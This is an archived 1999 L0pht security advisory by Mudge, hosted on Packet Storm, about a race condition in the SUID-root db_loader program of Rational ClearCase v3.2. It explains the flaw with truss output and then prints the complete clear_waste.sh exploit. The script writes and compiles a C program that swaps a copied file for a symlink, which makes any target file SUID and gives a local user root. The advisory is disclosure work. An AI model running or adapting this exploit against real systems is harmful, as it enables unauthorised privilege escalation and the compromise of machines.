exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ClearCase.txt

ClearCase.txt
Posted Aug 17, 1999
Authored by Mudge

Poor security coding leaves several race conditions and other security problems in Clear Case, a configuration management program from Rational Software. Local root compromise. "clear_waste.sh" exploit code included.

tags | exploit, local, root
SHA-256 | 956fb8fc120b620f5d57d1e03ed6693777c34c60bb007966b51b57d0a9569947

ClearCase.txt

Change Mirror Download

L0pht Security Advisory

Advisory released Jan 8 1999
Application: Rational Software's Clear Case v3.2
Severity: any local user can become root

Author: mudge@l0pht.com
http://www.L0pht.com/advisories.html

---
Overview :
---

ClearCase is a configuration management program from Rational Software.
Similar in some ways to CVS or Visual Source Safe.

The default installation of ClearCase installs the program db_loader
SUID root. One of the many security problems in this program is a race
condition which enables any user to add the SUID bit to any file on the
system.

For what it is worth IDC and other groups have given Clear Case awards.
Presumably these awards have nothing to do with security.

---
Example :
---

> ls -l /bin/ksh
-r-xr-xr-x 2 bin bin 186356 Jan 21 1998 /bin/ksh

> ./clear_waste.sh /bin/ksh

Clear Case proof of concept exploit code - mudge@l0pht.com 2.5.1999
one beer please!

creating race grinder....
created!

compiling race grinder...
compiled! Launching attack.... be patient

Looks succesfull!
-r-sr-xr-x 2 bin bin 186356 Jan 21 1998 /bin/ksh

don't forget to get rid of /var/tmp/cleartest


---
Description :
---

The database loader for pure atria is SUID root. A likely candidate for
mayhem and deliciousness. In addition it is around 1.5 megs in size -
way beyond the size of manageability for a program with elevated priveleges.

-r-sr-xr-x 1 root other 1527532 Jan 21 1998 /usr/atria/sun5/etc/db_loader

Taking a quick look at the binary shows plenty of places to exploit the
default behaviour.

[output from a truss -f -a -e -o /usr/atria/sun5/etc/db_loader /tmp]

1372: stat("/usr/atria/etc/db_dumper", 0xEFFFE400) = 0
1372: access("/tmp/db_dumper", 0) Err#2 ENOENT
1372: open("/usr/atria/etc/db_dumper", O_RDONLY) = 3
1372: open("/tmp/db_dumper", O_WRONLY|O_CREAT|O_TRUNC, 0100555) = 4
1372: read(3, "7F E L F010201\0\0\0\0\0".., 65536) = 65536
1372: write(4, "7F E L F010201\0\0\0\0\0".., 65536) = 65536
1372: read(3, " _ d e f a u l t\0 r _ t".., 65536) = 65536

..... you got it - they are copying db_dumper file to the directory you
specified.

1372: read(3, 0xEFFED690, 65536) = 0
1372: close(3) = 0
1372: fdsync(4, O_RDONLY|O_SYNC) = 0
1372: close(4) = 0
1372: utime("/tmp/db_dumper", 0xEFFFD6F0) = 0
1372: stat("/tmp/db_dumper", 0xEFFFE728) = 0
1372: chmod("/tmp/db_dumper", 0104555) = 0

And low and behold the ever popular chmod(2) call

So - we should have plenty of time for the race condition since they are using
calls which only return the information that was true at that explicit moment
in time. This type of coding assumes that the piece of information being
checked is invariant. /usr/atria/etc/db_dumper is also a ~1.5 meg file
so we have plenty of time to unlink and replace it while the copy is
taking place.

Most likely it would be even eaiser as we imagine that they will execute the
program later on... as it is this machine did not have a license
server it was permited to communicate with so it bombs out before any such
what-not can happen.

---
Exploit code :
---

------ begin clear_waste.sh --------

#!/bin/sh
#
# This is sample code that takes advantage of a race condition in
# Pure Atria's Clear Case db_loader program. The program will retain
# ownership of the file pointed to on the command line and have
# the clear case db_loader change the permissions to SUID
# .mudge@l0pht.com 2.5.1999
#
RACE_PROG=./clear_race
RACE_CODE=./clear_race.c
# you probabaly need to change the following to reflect your
# system and setup
#NICE=/usr/bin/nice
CC=/usr/local/bin/gcc
DB_LOADER=/usr/atria/sun5/etc/db_loader
RM=/bin/rm
LS=/bin/ls
MKDIR=/bin/mkdir
# you need to own the DEST DIR so you can delete files that you don't
# directly own
DEST_DIR=/var/tmp/cleartest.$$

if [ "$#" -ne "1" ] ; then
echo "usage: `basename $0` file_to_make_suid"
exit
fi

TARGET=$1

if [ ! -f ${TARGET} ] ; then
echo "target file must exist"
exit
fi

echo
echo "Clear Case proof of concept exploit code - mudge@l0pht.com 2.5.1999"
echo " one beer please!"
echo

${MKDIR} ${DEST_DIR}
if [ $? -gt 0 ] ; then
echo "go get rid of ${DEST_DIR} and try again..."
exit
fi

cd ${DEST_DIR}

# create the race runner
echo "creating race grinder...."
cat > ${RACE_CODE} << FOEFOE
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>

main(int argc, char *argv[])
{
struct stat statbuf;

printf("%d\n", argc);

if (argc != 2){
printf("bzzzzt! - wrong usage\n");
exit(0);
}

while (1){
if (stat("./db_dumper", &statbuf) == 0){
unlink("./db_dumper");
symlink(argv[1], "./db_dumper");
exit(0);
}
}
}
FOEFOE
echo "created!"
echo

# compile it
echo "compiling race grinder..."
${CC} -O2 -o ${RACE_PROG} ${RACE_CODE}

if [ ! -f ${RACE_PROG} ] ; then
echo "compile failed?"
${RM} -f ${RACE_CODE}
exit
fi

echo "compiled! Launching attack.... be patient"
echo


${RACE_PROG} ${TARGET} &
# let us give the progie a second or two to load up and get the runtime
# crap set
sleep 2

#${NICE} -n 2 ${DB_LOADER} ${DEST_DIR} > /dev/null 2>&1
# if you keep failing try the above and potentially increase the nice value
${DB_LOADER} ${DEST_DIR} > /dev/null 2>&1

if [ -u ${TARGET} ] ; then
echo "Looks succesfull!"
${LS} -l ${TARGET}
echo
echo "don't forget to get rid of ${DEST_DIR}"
echo
exit
fi

echo "doesn't look like it worked... "
echo "try again - after all it's a race condition!"
echo "don't forget to get rid of ${DEST_DIR}
echo

-------- end clear_waste.sh --------


mudge@l0pht.com
---------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://www.l0pht.com/advisories.html
---------------

Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close